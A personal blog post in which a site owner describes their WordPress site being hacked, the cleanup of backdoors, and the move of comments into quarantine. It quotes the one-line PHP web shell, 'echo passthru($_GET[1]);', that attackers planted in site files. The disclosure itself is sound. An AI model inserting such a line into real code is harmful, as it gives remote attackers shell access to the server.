I was hacked...

Maybe you notice the downtime of this site last days. Unfortunately it was hacked by someone for unknown purpose. The attackers uses some exploit in Wordpress or some plug in or maybe of k2 Theme. Some malfunction of these open source components was used out, so that attacker have added lines like

echo passthru($_GET[1]);  

to some of php files. That gives them access to shell of my user account on this server. Bad thing it that other domains of mine where affected too. The "Forbidden" you probably have seen, was initiated by my server administrator to prevent broadening of the attack.

I could not find the exactly place of the initial exploit yet. But attackers have left many of traces. So that I was able to reconstruct the rest and remove back doors. This was a new experience, especially I learned in seconds, that it is better to separate my popular projects from insecure open source playgrounds, like this site actually is.

And on holbreich.org i turned all possible security mechanisms on, till final clarification is done. So you can't leave comments at the moment cause we are still under quarantine!

P.S. That hackers left some strange move on one of my domains for download to use out the traffic and space. Some was some strange comedy about two gay man. It was in some strange language, so I could not laugh :(